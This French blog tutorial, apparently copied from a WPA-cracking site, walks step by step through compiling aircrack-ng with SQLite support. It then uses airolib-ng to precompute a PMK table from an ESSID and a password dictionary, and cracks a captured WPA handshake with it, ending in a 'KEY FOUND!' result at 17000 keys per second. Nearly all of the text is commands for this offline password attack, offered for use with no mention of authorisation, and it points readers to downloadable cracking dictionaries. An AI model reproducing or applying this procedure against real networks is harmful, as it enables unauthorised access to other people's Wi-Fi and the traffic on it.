A travers cet exercice, vous allez apprendre à utiliser airolib-ng pour créer une table précomputée en fonction de l'essid et du fichier dictionnaire dans une base de données sql. Cette opération, également connue sous le nom de "tables de hash" ou "rainbow tables" permet d'accélérer le crack.
1/ Intoduction, mise à jour de la suite aircrack-ng
Tout d'abord, sachez que cet exemple a été réalisé sous Backtrack 3 beta que vous pouvez trouver sur le site de Remote exploit. Les commandes sont les memes si vous etes sous Backtrack 2. Nous vous invitons d'ailleurs à visiter notre section wifi dans laquelle figurent des versions modifiées de Backtrack 2.
Pour démarrer, vous avez besoin de 3 éléments:
-un fichier de capture (.cap) contenant un handshake (voir le tutoriel crack wpa)
-un fichier dictionnaire (visitez notre section spéciale PACKS CRACK WPA)
-un fichier nommé essid.txt contenant l'essid du point d'accès (sur une seule ligne, pour pré-computer une table avec plusieurs essids rentrez un essid par ligne dans ce fichier)
Ces 3 fichiers doivent etre copiés dans /root, dossier depuis lequel nous allons créer la table.
Les 3 fichiers indispensables avant de se lancer dans l'utilisation de airolib-ng
Ces 3 fichiers étant copiés dans /root, l'exercice peut commencer. Notez que pour la mise à jour de la suite aircrack-ng, vous devez etre connecté à internet, les opérations de pré-computage de la table et de crack peuvent etre effectuées off line.
Toutes les commandes s'effectuent depuis /root. Ouvrez un shell et lancez:
svn co http://trac.aircrack-ng.org/svn/branch/1.0-dev/ aircrack-ng
La mise à jour doit se lancer, et vous indiquer en retour de console "Checked out", ainsi que la version de la suite aircrack-ng (ici la r 924).
Mise à jour de aircrack-ng réussie ;)
Rendez vous dans le dossier aircrack-ng:
cd aircrack-ng
Puis lancez la compilation du support nécessaire à airolib-ng, sqlite:
make SQLITE=true
compilation de sqlite
Enfin, lancez l'installation:
make SQLITE=true install
Installation de sqlite pour l'utilisation de airolib-ng
Airolib-ng est pret à utiliser.
ATTENTION, aircrack-ng évolue régulièrement. Le lien ci dessus n'est plus valide, pour mettre à jour la suite aircrack-ng vers la version 1.0 beta 2, (mai 2008) vous devez lancer les commandes suivantes:
wget http://download.aircrack-ng.org/aircrack-ng-1.0-beta2.tar.gz
tar -zxvf aircrack-ng-1.0-beta2.tar.gz
cd aircrack-ng-1.0-beta2
make
make install
Et enfin compiler airolib-ng:
make SQLITE=true
make SQLITE=true install
2/ Airolib-ng, création de la base de données
Revenez dans /root ou se trouvent les 3 fichiers nécessaires au crack.
cd /root
La création de la table peut commencer. Les commandes d'airolib-ng sont assez simples:
Usage: airolib-ng
Dans cet exemple, la table sera appelée crackwpa, le fichier contenant l'essid sera appelé essid.txt et le fichier dictionnaire sera test.txt. Adaptez les commandes en fonction des noms de vos fichiers.
Commencez par créer la table et y importer le fichier dictionnaire:
airolib-ng crackwpa --import passwd /root/test.txt
Création de la table et import du fichier dictionnaire
Importez le fichier contenant l'essid:
airolib-ng crackwpa --import essid /root/essid.txt
Import du fichier contenant l'essid
Vérifiez l'état de la base de données:
airolib-ng crackwpa --stats
Vérification de l'état de la base de données
Nettoyez votre base de données avant le batch:
airolib-ng crackwpa --clean all
Un petit nettoyage avant le batch
Lancez le batch (l'étape de pré-computage, la plus longue et la plus gourmande en ressources mémoire et processeur). Attention, si vous lancez le batch avec un fichier dictionnaire volumineux et peu de RAM, vous allez saturer la RAM du système et ralentir l'opération.
airolib-ng crackwpa --batch
Le précomputage, l'étape la plus longue: le CPU va tirer à 100% et la RAM va etre fortement sollicitée
Lancez une vérification générale de la table (étape facultative...Longue et gourmande en ressources... Mais recommandée):
airolib-ng crackwpa --verify all
Vérification générale de la base de données fraichement créée
3/ Aircrack-ng + Airolib-ng, un crack ultra rapide
La base de données étant créée et vérifiée, vous pouvez lancer le crack . Lancez la commande aircrack-ng -r nom-de-la-base-de-données nom-du-fichier-de-capture
Dans cet exemple:
aircrack-ng -r crackwpa out-01.cap
KEY FOUND! Un crack a 17000 mots de passe/seconde!.
KEY FOUND!
Comme toujours dans le cas du bruteforce d'un handshake, l'utilisation de plusieurs fichiers dictionnaires est indispensable. Avec airolib-ng, ce n'est plus le crack qui prend du temps mais le précomputage de la base de données. Cette étape peut s'avérer très longue dans le cas de l'utilisation de gros fichiers dictionnaires... Mais quand le crack se lance à plusieurs dizaines de milliers de mots de passe/seconde... C'est un régal.
Source : http://www.crack-wpa.fr/tutoriel-crack-wpa-avec-airolib-ng.php
Tuto vidéo :
Aucun commentaire:
Enregistrer un commentaire